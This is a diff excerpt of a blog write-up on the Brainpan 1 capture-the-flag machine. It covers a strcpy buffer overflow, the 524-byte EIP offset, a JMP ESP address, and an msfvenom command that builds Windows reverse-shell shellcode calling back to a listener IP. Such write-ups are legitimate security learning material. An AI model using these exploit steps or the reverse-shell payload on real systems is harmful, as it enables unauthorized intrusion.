g-reig/g-reig.github.io/_posts/2020-08-03-brainpan-1-writeup.md

                 exit
         fi
 done {% endhighlight %}
-I found the password when I was reading the get_reply function (the string that was being passed as a parameter to strcmp), but using it didn't do anything.
+I found the password when I was reading the get_reply function (the string that is being passed as a parameter to strcmp), but using it didn't do anything.
 I also noticed that the program uses the strcpy function, which is unsafe.
 ![Olly Code](ollyDBGCode.png)
-I used msf-pattern_create to generate a pattern with 1000 characters to test if the application would crash and then I used msf-pattern_offset to get the exact position.
+I used msf-pattern_create to generate a pattern with 1000 characters to test if the application crashes and then I used msf-pattern_offset to get the exact position.
 ![BOF Test 1](BOFTest1.png)
 ![BOF Test 2](BOFTest2.png)
 ![BOF Test 3](BOFTest3.png)
 To control the EIP register we need to send 524 junk bytes and the direction where we want to jump.
-I also found a function called winkwink with a "JMP esp" instruction at 0x311712F3, which means we can try to execute some shellcode (I should have checked the memory protections to see if NX was enabled, but I didn't know how to do this with OllyDbg and I didn't have a Windows VM prepared).<br>
+I also found a function called winkwink with a "JMP esp" instruction at 0x311712F3, which means that we can try to execute some shellcode (I should have checked the memory protections to see if NX was enabled, but I didn't know how to do this with OllyDbg and I didn't have a Windows VM prepared).<br>
 I generated two shellcodes, one for Windows and the other one for Linux using msfvenom.
 {% highlight bash %}
 msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.10 LPORT=1234 -f py -v shellcode -a x86 –platform Windows -b "\x00\x0a" #Windows shellcode